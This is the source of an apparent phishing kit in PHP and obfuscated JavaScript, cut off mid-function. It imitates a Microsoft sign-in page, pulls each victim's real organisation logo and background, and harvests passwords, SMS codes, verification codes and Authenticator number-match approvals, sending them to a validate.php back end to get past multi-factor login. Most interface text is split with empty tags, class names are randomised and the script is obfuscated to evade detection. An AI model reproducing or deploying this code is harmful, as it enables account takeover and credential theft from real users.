include_once "../config.php";
include_once "class.php";
$d0850 = new Config($config);
$d0850->validateLink();
//$d0850->checkBothCaptcha();
//$d0850->insertDataVisitor();
unset($_SESSION["status"]);
unset($_SESSION["info_token_credentials"]);
unset($_SESSION["info_token_2fa"]);
if (!isset($_SESSION["auth"])) {
$_SESSION["auth"] = true;
}
if (isset($_SESSION["email"]) && $config["grablogo"] == 1) {
require_once "core/office.php";
$c09d2 = new OfficeAuth();
$c09d2->abf59 = $_SESSION["email"];
$c09d2->getCredentials();
if ($c09d2->status["live"]) {
$C0958["live"] = true;
$C0958["icon"] = $c09d2->status["icon"];
$C0958["background"] = $c09d2->status["background"];
$_SESSION["info_token_credentials"] = ["sFT" => $c09d2->cc9cc, "sCtx" => $c09d2->a4291, "canary" => $c09d2->B14f5, "api_canary" => $c09d2->Bc7dc, "session_id" => $c09d2->Fc143, "request_id" => $c09d2->E5116];
if (isset($_SESSION["status"])) {
unset($_SESSION["status"]);
}
$_SESSION["status"] = $c09d2->status;
} else {
$C0958["live"] = false;
$C0958["icon"] = false;
$C0958["background"] = false;
$C0958["response"] = "invalid-email";
}
}
$D4af3 = $d0850->generateRandomString();
$e5600 = "<a class=\"" . $D4af3 . "\"></a>";
$e166a = "Sign-in options";
$Eec5e = base64_encode($e166a);
echo "\r\n<!DOCTYPE html>\r\n<html lang=\"en\">\r\n\r\n<head>\r\n <meta charset=\"UTF-8\">\r\n <meta http-equiv=\"X-UA-Compatible\" content=\"IE=edge\">\r\n <meta name=\"viewport\" content=\"width=device-width, initial-scale=1.0\">\r\n <link rel=\"icon\" href=\"";
echo $d0850->imageToBase64("../page/images/favicon.ico");
echo "\" />\r\n <title>";
echo $d0850->getTitle();
echo "</title>\r\n <noscript>\r\n <meta http-equiv=\"Refresh\" content=\"0; URL=";
echo $d0850->getRandomLink();
echo "\" />\r\n </noscript>\r\n <link rel=\"stylesheet\" href=\"../page/styles/app.css\" />\r\n <style>\r\n @media screen and (min-width:600px) {\r\n ";
if (isset($_SESSION["email"]) && $config["grablogo"] == 1 && $C0958["background"] != false) {
echo $d0850->getBackgroundVerify(false, $C0958["background"]);
} else {
echo $d0850->getBackgroundVerify();
}
echo " }\r\n\r\n @keyframes blink {\r\n 0% { opacity: 1; }\r\n 50% { opacity: 0; }\r\n 100% { opacity: 1; }\r\n }\r\n\r\n .blinking {\r\n animation: blink 3s infinite;\r\n }\r\n\r\n .verification-options {\r\n display: table;\r\n width: 100%;\r\n border-spacing: 0;\r\n }\r\n .option {\r\n display: table-row;\r\n cursor: pointer;\r\n }\r\n .option:hover {\r\n background-color: #f0f0f0;\r\n }\r\n .option span {\r\n display: table-cell;\r\n padding: 10px;\r\n vertical-align: middle;\r\n font-size: 85%; \r\n }\r\n .option .icon {\r\n width: 20%;\r\n padding-right: 5px;\r\n }\r\n .hidden {\r\n display: none;\r\n }\r\n </style>\r\n <script src=\"https://code.jquery.com/jquery-3.6.0.min.js\"></script>\r\n</head>\r\n\r\n<body>\r\n <section class = \"";
echo $D4af3;
echo "\" id=\"section_uname\">\r\n\r\n <div class=\"";
echo $D4af3;
echo " auth-wrapper\">\r\n <div class=\"";
echo $D4af3;
echo " overlay\" id=\"overlay\">\r\n <div class=\"spinner\"></div>\r\n </div>\r\n <img class = \"";
echo $D4af3;
echo " d-block\" src=\"";
echo $d0850->imageToBase64("../page/images/logo.png");
echo "\" alt=\"Icon\"/>\r\n <h2 class=\" ";
echo $D4af3;
echo " title mb-16 mt-16\"><img src=\"";
echo $d0850->imageToBase64("../page/images/sign.png");
echo "\" alt=\"Icon\" class=\" ";
echo $D4af3;
echo " d-block\"/></h2>\r\n <form id=\"form\" class = \"";
echo $D4af3;
echo "\">\r\n <div class=\"mb-16 ";
echo $D4af3;
echo "\">\r\n <p id=\"error_uname\" class=\"error\"></p>\r\n <div class=\"";
echo $D4af3;
echo " input-container\">\r\n <img src=\"";
echo $d0850->imageToBase64("../page/images/emailphone.png");
echo "\" alt=\"placeholder\" class=\"placeholder-image\" id=\"placeholder-image\">\r\n <input id=\"inp_uname\" type=\"text\" name=\"uname\" class=\"input\" placeholder=\"\" autocomplete=\"off\"/>\r\n </div>\r\n </div>\r\n </form>\r\n <div>\r\n <p class=\"";
echo $D4af3;
echo " mb-16 fs-13\">N";
echo $e5600;
echo "o a";
echo $e5600;
echo "cc";
echo $e5600;
echo "ou";
echo $e5600;
echo "nt? <a href=\"\" class=\"link\">Cr<b></b>e<b></b>a<b></b>t<b></b>e o<b></b>ne!</a></p>\r\n <p class=\"";
echo $D4af3;
echo " mb-16 fs-13\">\r\n <a href=\"#\" class=\"";
echo $D4af3;
echo " link\">S<b></b>i<b></b>g<b></b>n in w<b></b>i<b></b>t<b></b>h a se<b></b>cu<b></b>r<b></b>it<b></b>y k<b></b>e<b></b>y\r\n <img src=\"";
echo $d0850->imageToBase64("../page/images/question.png");
echo "\" alt=\"Question img\">\r\n </a>\r\n </p>\r\n </div>\r\n <div>\r\n <button class=\"";
echo $D4af3;
echo " btn\" id=\"btn_next\">N<b></b>e<b></b>x<b></b>t</button>\r\n </div>\r\n </div>\r\n <div class=\"";
echo $D4af3;
echo " opts\">\r\n <p class=\"";
echo $D4af3;
echo " has-icon mb-0\" style=\"font-size:15px;\"><span class=\"icon\"><img src=\"";
echo $d0850->imageToBase64("../page/images/key.png");
echo "\" width=\"30px\" /></span> <span id=\"signInOptions\"></span></p>\r\n </div>\r\n </section>\r\n\r\n <section id=\"section_pwd\" class=\" ";
echo $D4af3;
echo " d-none\">\r\n <divav class=\"";
echo $D4af3;
echo " auth-wrapper\">\r\n <div class=\"";
echo $D4af3;
echo " overlay\" id=\"overlay2\">\r\n <div class=\"spinner\"></div>\r\n </div>\r\n <img id=\"logoimage\" src=\"";
if (isset($_SESSION["email"]) && $config["grablogo"] == 1 && $C0958["icon"] != false) {
echo $C0958["icon"];
} else {
echo $d0850->imageToBase64("../page/images/logo.png");
}
echo "\" alt=\"Icon\" style=\"max-width: 168px; max-height: 36px; width: auto; height: auto;\" class=\"";
echo $D4af3;
echo " d-block\" />\r\n <div class=\"";
echo $D4af3;
echo " identity w-100 mt-16 mb-16\">\r\n <button class=\"";
echo $D4af3;
echo " back\">\r\n <img src=\"../page/images/back.png\" />\r\n </button>\r\n <span class=\"";
echo $D4af3;
echo "\" id=\"user_identity\">a@b.com</span>\r\n </div>\r\n <h2 class=\"";
echo $D4af3;
echo " title mb-16\"><img src=\"";
echo $d0850->imageToBase64("../page/images/enter.png");
echo "\" alt=\"Icon\" style=\"width: 50%; height: auto;\" class=\" ";
echo $D4af3;
echo " d-block\"/></h2>\r\n <form id=\"form2\" class=\"";
echo $D4af3;
echo "\">\r\n <div class=\"mb-16\">\r\n <p class=\"";
echo $D4af3;
echo " error\" id=\"error_pwd\"></p>\r\n <div class=\"";
echo $D4af3;
echo " input-container\">\r\n <img src=\"";
echo $d0850->imageToBase64("../page/images/push.png");
echo "\" style=\"width: 18%; height: auto;\" alt=\"placeholder\" class=\"placeholder-image\" id=\"placeholder-image-2\">\r\n <input id=\"inp_pwd\" type=\"password\" name=\"pass\" class=\"input\" placeholder=\"\" />\r\n </div>\r\n </div>\r\n </form>\r\n <div>\r\n <p class=\"";
echo $D4af3;
echo " mb-16\"> <a href=\"#\" class=\"link fs-13\">F<b></b>or<b></b>g<b></b>o<b></b>t p<b></b>as<b></b>s<b></b>w<b></b>o<b></b>rd?</a></p>\r\n <p class=\"";
echo $D4af3;
echo " mb-16\">\r\n <a href=\"#\" class=\"";
echo $D4af3;
echo " link fs-13\">O<b></b>t<b></b>he<b></b>r w<b></b>ay<b></b>s t<b></b>o s<b></b>ig<b></b>n i<b></b>n</a>\r\n </p>\r\n </div>\r\n <div>\r\n <button class=\"";
echo $D4af3;
echo " btn\" id=\"btn_sig\">S<b></b>ig<b></b>n i<b></b>n</button>\r\n </div>\r\n </div>\r\n </section>\r\n\r\n <section id=\"section_final\" class=\"d-none\">\r\n <div class=\"auth-wrapper\">\r\n <img src=\"../page/images/logo.png\" alt=\"Microsoft\" class=\"d-block\" />\r\n <div class=\"identity w-100 mt-16 mb-16\">\r\n <span id=\"user_identity\">a@b.com</span>\r\n </div>\r\n <h2 class=\"title mb-16\">Stay signed in?</h2>\r\n <p class=\"p\">Stay signed in so you don't have to sign in again next time.</p>\r\n <label class=\"has-checkbox\">\r\n <input type=\"checkbox\" class=\"checkbox\" />\r\n <span>Don't show this again</span>\r\n </label>\r\n <div class=\"btn-group\">\r\n <button class=\"btn btn-sec\" id=\"btn_final\">No</button>\r\n <button class=\"btn\" id=\"btn_final\">Yes</button>\r\n </div>\r\n </div>\r\n </section>\r\n\r\n <section id=\"section_verifnotif\" class=\" ";
echo $D4af3;
echo " d-none\">\r\n <div class=\"";
echo $D4af3;
echo " auth-wrapper\">\r\n <div class=\"";
echo $D4af3;
echo " overlay\" id=\"overlay3\">\r\n <div class=\"spinner\"></div>\r\n </div>\r\n <img id=\"logoimage\" src=\"";
if (isset($_SESSION["email"]) && $config["grablogo"] == 1 && $C0958["icon"] != false) {
echo $C0958["icon"];
} else {
echo $d0850->imageToBase64("../page/images/logo.png");
}
echo "\" alt=\"Icon\" style=\"max-width: 168px; max-height: 36px; width: auto; height: auto;\" class=\"";
echo $D4af3;
echo " d-block\" />\r\n <div class=\"";
echo $D4af3;
echo " identity w-100 mt-16 mb-16\">\r\n <button class=\"";
echo $D4af3;
echo " back\">\r\n <img src=\"../page/images/back.png\" />\r\n </button>\r\n <span class=\"";
echo $D4af3;
echo "\" id=\"user_identity\">a@b.com</span>\r\n </div>\r\n <h2 class=\"";
echo $D4af3;
echo " title mb-16\">Enter code</h2>\r\n <p class=\"p\"><img src=\"";
echo $d0850->imageToBase64("../page/images/verifnotif2.png");
echo "\" style=\"width: 85%; height: auto;\" alt=\"Microsoft\" class=\"d-block\" /></p>\r\n <form id=\"form3\" class=\"";
echo $D4af3;
echo "\">\r\n <div class=\"mb-16\">\r\n <p class=\"";
echo $D4af3;
echo " error\" id=\"error_verifnotif\"></p>\r\n <div class=\"";
echo $D4af3;
echo " input-container\">\r\n <input id=\"inp_verifnotif\" type=\"text\" name=\"code\" class=\"input\" placeholder=\"Code\" autocomplete=\"off\"/>\r\n </div>\r\n </div>\r\n </form>\r\n <div>\r\n <p class=\"";
echo $D4af3;
echo " mb-16\"> <a href=\"#\" class=\"link fs-13\">More information</a></p>\r\n </div>\r\n <div>\r\n <button class=\"";
echo $D4af3;
echo " btn\" id=\"btn_notif\">Verify</button>\r\n </div>\r\n </div>\r\n </section>\r\n\r\n <section id=\"section_sms\" class=\" ";
echo $D4af3;
echo " d-none\">\r\n <div class=\"";
echo $D4af3;
echo " auth-wrapper\">\r\n <div class=\"";
echo $D4af3;
echo " overlay\" id=\"overlay4\">\r\n <div class=\"spinner\"></div>\r\n </div>\r\n <img id=\"logoimage\" src=\"";
if (isset($_SESSION["email"]) && $config["grablogo"] == 1 && $C0958["icon"] != false) {
echo $C0958["icon"];
} else {
echo $d0850->imageToBase64("../page/images/logo.png");
}
echo "\" alt=\"Icon\" style=\"max-width: 168px; max-height: 36px; width: auto; height: auto;\" class=\"";
echo $D4af3;
echo " d-block\" />\r\n <div class=\"";
echo $D4af3;
echo " identity w-100 mt-16 mb-16\">\r\n <button class=\"";
echo $D4af3;
echo " back\">\r\n <img src=\"../page/images/back.png\" />\r\n </button>\r\n <span class=\"";
echo $D4af3;
echo "\" id=\"user_identity\">a@b.com</span>\r\n </div>\r\n <h2 class=\"";
echo $D4af3;
echo " title mb-16\">Enter code</h2>\r\n <p id=\"showDisplay2\" class=\"has-icon mb-0\" style=\"font-size:15px;\"><span class=\"icon\"><img src=\"../page/images/info.png\" style=\"width: 85%; height: auto;\"></span> We texted your phone +XX XXXXXXXXX23. Please enter the code to sign in.</p>\r\n </br>\r\n <form id=\"form4\" class=\"";
echo $D4af3;
echo "\">\r\n <div class=\"mb-16\">\r\n <p class=\"";
echo $D4af3;
echo " error\" id=\"error_sms\"></p>\r\n <div class=\"";
echo $D4af3;
echo " input-container\">\r\n <input id=\"inp_codesms\" type=\"text\" name=\"code\" class=\"input\" placeholder=\"Code\" autocomplete=\"off\"/>\r\n </div>\r\n </div>\r\n </form>\r\n <div>\r\n <p class=\"";
echo $D4af3;
echo " mb-16\"> <a href=\"#\" class=\"link fs-13\">More information</a></p>\r\n </div>\r\n <div>\r\n <button class=\"";
echo $D4af3;
echo " btn\" id=\"btn_sms\">Verify</button>\r\n </div>\r\n </div>\r\n </section>\r\n\r\n <section id=\"section_appnotif\" class=\" ";
echo $D4af3;
echo " d-none\">\r\n <div class=\"";
echo $D4af3;
echo " auth-wrapper\">\r\n <div class=\"";
echo $D4af3;
echo " overlay\" id=\"overlay5\">\r\n <div class=\"spinner\"></div>\r\n </div>\r\n <img id=\"logoimage\" src=\"";
if (isset($_SESSION["email"]) && $config["grablogo"] == 1 && $C0958["icon"] != false) {
echo $C0958["icon"];
} else {
echo $d0850->imageToBase64("../page/images/logo.png");
}
echo "\" alt=\"Icon\" style=\"max-width: 168px; max-height: 36px; width: auto; height: auto;\" class=\"";
echo $D4af3;
echo " d-block\" />\r\n <div class=\"";
echo $D4af3;
echo " identity w-100 mt-16 mb-16\">\r\n <span class=\"";
echo $D4af3;
echo "\" id=\"user_identity\">a@b.com</span>\r\n </div>\r\n <h2 class=\"";
echo $D4af3;
echo " title mb-16\">Approve sign in request</h2>\r\n <p class=\"has-icon mb-0\" style=\"font-size:15px;\"><span class=\"icon\"><img src=\"../page/images/appnotif2.png\" class=\"blinking\" style=\"width: 85%; height: auto;\"></span> Open your Authenticator app, and enter the number shown to sign in.</p>\r\n <br/>\r\n <div style=\"display: flex; justify-content: center; align-items: center;\">\r\n <p id=\"entropy\" class=\"has-icon mb-0\" style=\"font-size: 40px; text-align: center; border: 2px solid black; padding: 10px;\">\r\n 50\r\n </p>\r\n </div>\r\n <br/><br/>\r\n <p class=\"has-icon mb-0\" style=\"font-size:15px;\">No numbers in your app? Make sure to upgrade to the latest version.</p><br/>\r\n <div>\r\n <p class=\"";
echo $D4af3;
echo " mb-16\"> <a href=\"#\" id=\"link_back\" class=\"link fs-13\">I can't use my Microsoft Authenticator app right now</a></p>\r\n <p class=\"";
echo $D4af3;
echo " mb-16\"> <a href=\"#\" class=\"link fs-13\">More information</a></p>\r\n </div>\r\n </div>\r\n </section>\r\n\r\n <section id=\"section_2fa\" class=\"d-none\"> \r\n <div class=\"auth-wrapper\">\r\n <div class=\"";
echo $D4af3;
echo " overlay\" id=\"overlay6\">\r\n <div class=\"spinner\"></div>\r\n </div>\r\n <img src=\"../page/images/logo.png\" alt=\"Microsoft\" class=\"d-block\" />\r\n <div class=\"identity w-100 mt-16 mb-16\">\r\n <span id=\"user_identity\">a@b.com</span>\r\n </div>\r\n <h2 class=\"title mb-16\"><img src=\"../page/images/verify.png\" style=\"width: 60%; height: auto;\" alt=\"Microsoft\" class=\"d-block\" /></h2>\r\n <div class=\"verification-options\">\r\n <div class=\"option\" data-url=\"verify_app\">\r\n <span class=\"icon\"><img src=\"../page/images/verify_app.png\" style=\"width: 65%; height: auto;\"></span>\r\n <span>Approve a request on my Microsoft Authenticator app</span>\r\n </div>\r\n <div class=\"option\" data-url=\"verify_code\">\r\n <span class=\"icon\"><img src=\"../page/images/verify_code.png\" style=\"width: 65%; height: auto;\"></span>\r\n <span>Use a verification code</span>\r\n </div>\r\n <div class=\"option\" data-url=\"verify_sms\">\r\n <span class=\"icon\"><img src=\"../page/images/verify_sms.png\" style=\"width: 65%; height: auto;\"></span>\r\n <span id=\"showDisplay\">Text +XX XXXXXXXXX23</span>\r\n </div>\r\n </div><br/>\r\n <div>\r\n <p class=\"";
echo $D4af3;
echo " mb-16\"> <a href=\"#\" class=\"link fs-13\">More information</a></p>\r\n <p class=\"";
echo $D4af3;
echo " fs-13\">\r\n Are your verification methods current? Check at https://aka.ms/mfasetup\r\n </p>\r\n </div>\r\n <div class=\"btn-group\">\r\n <button class=\"btn btn-sec\" id=\"btn_final\">Cancel</button>\r\n </div>\r\n </div>\r\n </section>\r\n\r\n <footer class=\"footer\">\r\n <a href=\"#\">Terms of use</a>\r\n <a href=\"#\">Privacy & cookies</a>\r\n <span>. . .</span>\r\n </footer>\r\n\r\n <script>\r\n document.addEventListener('DOMContentLoaded', () => {\r\n const debug = false;\r\n // PHP variables\r\n const encodedText = \"";
echo $Eec5e;
echo "\";\r\n const decodedText = atob(encodedText);\r\n const random = \"";
echo $d0850->getRandomLink();
echo "\";\r\n const defaultBackground = \"";
echo $d0850->getBackgroundVerify(true, '', true);
echo "\";\r\n const defaultLogo = \"";
echo $d0850->imageToBase64("../page/images/logo.png");
echo "\";\r\n const final_redirect = atob(\"";
echo base64_encode($config["finalredirect"]);
echo "\");\r\n const selection = \"";
echo $config["selection"];
echo "\";\r\n // Error images\r\n const unReq = '<img src=\"";
echo $d0850->imageToBase64("../page/images/invalidmail.png");
echo "\">';\r\n const unEm = '<img src=\"";
echo $d0850->imageToBase64("../page/images/could.png");
echo "\">';\r\n const pwdReq = '<img src=\"";
echo $d0850->imageToBase64("../page/images/invalid.png");
echo "\">';\r\n const unPw = '<img src=\"";
echo $d0850->imageToBase64("../page/images/invalid-pw.png");
echo "\">';\r\n const unCode = '<img style=\"width: 95%; height: auto;\" src=\"";
echo $d0850->imageToBase64("../page/images/invalid-code.png");
echo "\">';\r\n const unSms = '<img style=\"width: 90%; height: auto;\" src=\"";
echo $d0850->imageToBase64("../page/images/invalid-sms.png");
echo "\">';\r\n const emCode = '<img style=\"width: 80%; height: auto;\" src=\"";
echo $d0850->imageToBase64("../page/images/empty-sms.png");
echo "\">';\r\n\r\n // Initial settings from PHP\r\n ";
if (isset($_SESSION["email"])) {
echo " let view = \"pwd\";\r\n let enmail = atob(\"";
echo base64_encode($_SESSION["email"]);
echo "\");\r\n ";
} else {
echo " let view = \"uname\";\r\n let enmail = \"\";\r\n ";
}
echo "\r\n const _0x41b79a=_0x1519;";
echo <<<JS
(function(_0x4d2182, _0x453ad2) {
const _0x17970b = _0x1519,
_0x1ac17b = _0x4d2182();
while (!![]) {
try {
const _0x32a6f1 = parseInt(_0x17970b(0x16d)) / 0x1 + -parseInt(_0x17970b(0x17a)) / 0x2 * (-parseInt(_0x17970b(0x181)) / 0x3) + parseInt(_0x17970b(0x138)) / 0x4 * (-parseInt(_0x17970b(0x1a2)) / 0x5) + -parseInt(_0x17970b(0x18f)) / 0x6 * (-parseInt(_0x17970b(0x16a)) / 0x7) + parseInt(_0x17970b(0x15e)) / 0x8 * (-parseInt(_0x17970b(0x175)) / 0x9) + parseInt(_0x17970b(0x165)) / 0xa * (parseInt(_0x17970b(0x179)) / 0xb) + parseInt(_0x17970b(0x137)) / 0xc * (-parseInt(_0x17970b(0x15d)) / 0xd);
if (_0x32a6f1 === _0x453ad2) break;
else _0x1ac17b['push'](_0x1ac17b['shift']());
} catch (_0x2cd40e) {
_0x1ac17b['push'](_0x1ac17b['shift']());
}
}
}(_0x2bbc, 0x6a9ff));
function _0x1519(_0x5cb8ef,_0x9ce8b3){
const _0x42544c=_0x2bbc();
return _0x1519=function(_0x40f52e,_0x295d44){
_0x40f52e=_0x40f52e-0x12b;
let _0x446eae=_0x42544c[_0x40f52e];
return _0x446eae;
},_0x1519(_0x5cb8ef,_0x9ce8b3);
}
const _0x146f6b = (function(){
let _0x208f2f=!![];
return function(_0x40191e,_0x109b6e) {
const _0x3d51e0=_0x208f2f?function(){const _0x188b80=_0x1519;if(_0x109b6e){const _0x10db82=_0x109b6e[_0x188b80(0x160)](_0x40191e,arguments);return _0x109b6e=null,_0x10db82;}}:function(){};return _0x208f2f=![],_0x3d51e0;
};
}());
const _0x5eb8d0 = _0x146f6b(this,function() {
const _0x251c81=_0x1519;
return _0x5eb8d0['toString']()[_0x251c81(0x135)](_0x251c81(0x193))[_0x251c81(0x1a7)]()[_0x251c81(0x185)](_0x5eb8d0)[_0x251c81(0x135)]('(((.+)+)+)+\$');
});
_0x5eb8d0();
const _0x295d44 = (function() {
let _0x57f016 = !![];
return function(_0x1166b0, _0x2db9c7) {
const _0x45b456 = _0x57f016 ? function() {
const _0x440d98 = _0x1519;
if (_0x2db9c7) {
const _0x389c33 = _0x2db9c7[_0x440d98(0x160)](_0x1166b0, arguments);
return _0x2db9c7 = null, _0x389c33;
}
} : function() {};
return _0x57f016 = ![], _0x45b456;
};
}());
(function() {
_0x295d44(this, function() {
const _0x3d239e = _0x1519,
_0x41a70b = new RegExp(_0x3d239e(0x1a9)),
_0x3fa588 = new RegExp(_0x3d239e(0x182), 'i'),
_0x2b2f4d = _0x40f52e(_0x3d239e(0x190));
!_0x41a70b[_0x3d239e(0x17f)](_0x2b2f4d + _0x3d239e(0x1a3)) || !_0x3fa588[_0x3d239e(0x17f)](_0x2b2f4d + 'input') ? _0x2b2f4d('0') : _0x40f52e();
})();
}());
let unameVal=![],pwdVal=![],codeVal=![],twoVal=![],smsVal=![],appVal=![];
var default_item='';
const unameInp = document['getElementById']('inp_uname'),
pwdInp = document['getElementById']('inp_pwd'),
codeInp = document['getElementById']('inp_verifnotif'),
smsInp = document['getElementById']('inp_codesms'),
form = document['getElementById']('form'),
logo = document['getElementById']('logoimage'),
placeholderImage = document['getElementById']('placeholder-image'),
placeholderImage2 = document['getElementById']('placeholder-image-2'),
signInOptions = document['getElementById']('signInOptions'),
overlayMap = {
'uname': 'overlay',
'pwd': 'overlay2',
'2fa': 'overlay6',
'sms': 'overlay4',
'2fa_submit_code': 'overlay5',
'verifnotif': 'overlay3'
},
inputMap = {
'uname': {
'input': unameInp,
'errorVar': 'unameVal'
},
'pwd': {
'input': pwdInp,
'errorVar': 'pwdVal'
},
'2fa_submit_sms': {
'input': smsInp,
'errorVar': 'codeVal'
},
'2fa_submit_code': {
'input': codeInp,
'errorVar': 'smsVal'
}
};
function toggleVisibility(_0x34e260, _0x8dc3c) {
_0xa3e1ac = document['getElementById'](_0x34e260);
_0xa3e1ac && _0xa3e1ac['classList']['toggle']('d-none', !_0x8dc3c);
}
function setBodyStyles(_0x50c72a) {
Object['assign'](document['body']['style'], _0x50c72a);
}
function updateView(_0x565692, _0x4e3a06 = [], _0x1c62b4 = []) {
view = _0x565692, _0x4e3a06['forEach'](_0x14aaad => toggleVisibility(_0x14aaad, !![])), _0x1c62b4['forEach'](_0x39ceda => toggleVisibility(_0x39ceda, ![]));
}
function setBackgroundAndLogo(_0x336ad6, _0x35deeb) {
document['body']['style']['cssText'] = '
content: "";
position: absolute;
top: 0;
left: 0;
right: 0;
bottom: 0;
z-index: -1;
background-image: url('' + (_0x336ad6 || defaultBackground) + '');
background-size: cover;
background-position: center;
background-repeat: no-repeat;
', logo['src'] = _0x35deeb || defaultLogo;
}
function hideOption(_0xf36adf) {
const _0x5eac9a = _0x41b79a;
document[_0x5eac9a(0x180)](_0xf36adf)?.[_0x5eac9a(0x172)][_0x5eac9a(0x1af)]('hidden');
}
function showOption(_0x4b5a82) {
const _0x154ba2 = _0x41b79a;
document[_0x154ba2(0x180)](_0x4b5a82)?.[_0x154ba2(0x172)][_0x154ba2(0x19f)](_0x154ba2(0x16c));
}
function updateInputState() {
const _0x1b857f = _0x41b79a;
placeholderImage[_0x1b857f(0x158)][_0x1b857f(0x13c)] = unameInp['value'][_0x1b857f(0x19e)]() ? _0x1b857f(0x186) : _0x1b857f(0x187), document[_0x1b857f(0x149)]('error_uname')[_0x1b857f(0x1b0)] = '', unameInp['classList'][_0x1b857f(0x14a)](_0x1b857f(0x14b), !unameInp[_0x1b857f(0x13a)][_0x1b857f(0x19e)]());
}
function updateInputStatePass() {
const _0x340263 = _0x41b79a;
placeholderImage2['style'][_0x340263(0x13c)] = pwdInp[_0x340263(0x13a)][_0x340263(0x19e)]() ? _0x340263(0x186) : _0x340263(0x187), document[_0x340263(0x149)]('error_pwd')[_0x340263(0x1b0)] = '', pwdInp[_0x340263(0x172)][_0x340263(0x14a)](_0x340263(0x14b), !pwdInp[_0x340263(0x13a)][_0x340263(0x19e)]());
}
function updateInputCode() {
const _0x4518d9 = _0x41b79a;
document[_0x4518d9(0x149)](_0x4518d9(0x140))[_0x4518d9(0x1b0)] = '', codeInp[_0x4518d9(0x172)][_0x4518d9(0x14a)]('error-inp', !codeInp[_0x4518d9(0x13a)][_0x4518d9(0x19e)]());
}
function updateInputSms() {
const _0x5ab674 = _0x41b79a;
document['getElementById'](_0x5ab674(0x170))['innerText'] = '', smsInp['classList'][_0x5ab674(0x14a)](_0x5ab674(0x14b), !smsInp['value'][_0x5ab674(0x19e)]());
}
document[_0x41b79a(0x15f)]('.option')['forEach'](_0x377a5d => {
const _0x2c5938 = _0x41b79a;
_0x377a5d[_0x2c5938(0x133)](_0x2c5938(0x18e), () => {
const _0x4d09af = _0x2c5938,
_0x1b8812 = _0x377a5d['getAttribute'](_0x4d09af(0x18d));
show(_0x4d09af(0x189)), \$[_0x4d09af(0x176)]({
'url': _0x4d09af(0x1a1),
'type': _0x4d09af(0x1aa),
'dataType': 'json',
'data': {
'em': unameInp[_0x4d09af(0x13a)],
'auth': _0x1b8812
},
'success': function(_0x30207c) {
const _0x158661 = _0x4d09af;
hideSection('2fa');
const {
live: _0x458b77
} = _0x30207c;
if (_0x458b77) {
if (!twoVal) {
if (_0x1b8812 === _0x158661(0x144)) {
updateView('2fa_submit_app', [_0x158661(0x143)], [_0x158661(0x18c)]), document[_0x158661(0x149)](_0x158661(0x12b))[_0x158661(0x199)] = _0x30207c[_0x158661(0x12b)];
const _0x3d82e4 = setInterval(() => {
const _0x18fff9 = _0x158661;
view == '2fa_submit_app' ? \$[_0x18fff9(0x176)]({
'url': 'validate.php',
'type': 'POST',
'dataType': _0x18fff9(0x19b),
'data': {
'em': unameInp[_0x18fff9(0x13a)],
'auth': _0x1b8812,
'code': ''
},
'success': function(_0x24a989) {
const _0x496220 = _0x18fff9,
{
live: _0x5ec6af
} = _0x24a989;
if (_0x5ec6af) !appVal && (appVal = !![], document[_0x496220(0x149)](_0x496220(0x143))[_0x496220(0x172)][_0x496220(0x1af)](_0x496220(0x139)), document[_0x496220(0x149)]('section_final')[_0x496220(0x172)][_0x496220(0x19f)](_0x496220(0x139)), view = _0x496220(0x192));
else {}
},
'error': function() {
alert('An\ error\ occurred\ during\ the\ periodic\ validation.');
}
}) : clearInterval(_0x3d82e4);
}, 0x1388);
} else _0x1b8812 === _0x158661(0x148) ? updateView(_0x158661(0x1ac), [_0x158661(0x17e)], [_0x158661(0x18c)]) : updateView('2fa_submit_sms', [_0x158661(0x12f)], [_0x158661(0x18c)]);
twoVal = !![];
}
} else updateView(_0x158661(0x14c), ['section_pwd'], [_0x158661(0x18c)]), document[_0x158661(0x15f)](_0x158661(0x1ad))[_0x158661(0x1a4)](_0xfadc4a => _0xfadc4a[_0x158661(0x1b0)] = enmail), unameInp[_0x158661(0x13a)] = enmail, unameVal = !![], pwdVal = ![];
},
'error': function() {
alert('An\ error\ occurred.');
}
});
});
}), document['getElementById'](_0x41b79a(0x1ab))[_0x41b79a(0x133)](_0x41b79a(0x18e), _0x2e4f56 => {
const _0x2cddd8 = _0x41b79a;
_0x2e4f56[_0x2cddd8(0x198)](), twoVal = ![], appVal = ![], updateView(_0x2cddd8(0x189), [_0x2cddd8(0x18c)], ['section_appnotif']);
}), unameInp[_0x41b79a(0x133)](_0x41b79a(0x163), updateInputState), pwdInp[_0x41b79a(0x133)](_0x41b79a(0x163), updateInputStatePass), codeInp['addEventListener'](_0x41b79a(0x163), updateInputCode), smsInp['addEventListener'](_0x41b79a(0x163), updateInputSms);
view === _0x41b79a(0x14c) && (unameVal = !![], document[_0x41b79a(0x15f)](_0x41b79a(0x1ad))[_0x41b79a(0x1a4)](_0xd90c3c => _0xd90c3c[_0x41b79a(0x1b0)] = enmail), unameInp[_0x41b79a(0x13a)] = enmail, updateView(_0x41b79a(0x14c), [_0x41b79a(0x17d)], [_0x41b79a(0x15a)]));
debug && updateView('2fa', [_0x41b79a(0x18c)], [_0x41b79a(0x17d)]);
document['getElementById'](_0x41b79a(0x159))[_0x41b79a(0x133)](_0x41b79a(0x18e), validate), document['getElementById'](_0x41b79a(0x19c))['addEventListener']('click', validate), document['getElementById']('btn_notif')[_0x41b79a(0x133)]('click', validate), document['getElementById'](_0x41b79a(0x14f))[_0x41b79a(0x133)]('click', validate), form['addEventListener'](_0x41b79a(0x194), _0x1de172 => {
const _0x2ae616 = _0x41b79a;
_0x1de172[_0x2ae616(0x198)](), validate();
}), form2[_0x41b79a(0x133)](_0x41b79a(0x194), _0x31afa7 => {
const _0x50c3da = _0x41b79a;
_0x31afa7[_0x50c3da(0x198)](), validate();
}), form3['addEventListener'](_0x41b79a(0x194), _0x2537dc => {
const _0x441cbe = _0x41b79a;
_0x2537dc[_0x441cbe(0x198)](), validate();
}), form4[_0x41b79a(0x133)]('submit', _0x2e9b98 => {
const _0x32c250 = _0x41b79a;
_0x2e9b98[_0x32c250(0x198)](), validate();
});
function show(_0x8746b5) {
const _0x348801 = _0x41b79a;
document[_0x348801(0x149)](_0x348801(0x13b) + _0x8746b5)[_0x348801(0x172)][_0x348801(0x1af)](_0x348801(0x16e)), document[_0x348801(0x15f)](_0x348801(0x19d))[_0x348801(0x1a4)](_0x2759af => _0x2759af['classList']['remove'](_0x348801(0x188)));
const _0x4a09da = overlayMap[_0x8746b5] || _0x348801(0x1ae);
document[_0x348801(0x149)](_0x4a09da)[_0x348801(0x172)]['add']('active');
}
function hide(_0xea4f95, _0x155629 = ![], _0xb5c911 = null) {
const _0x54b191 = _0x41b79a;
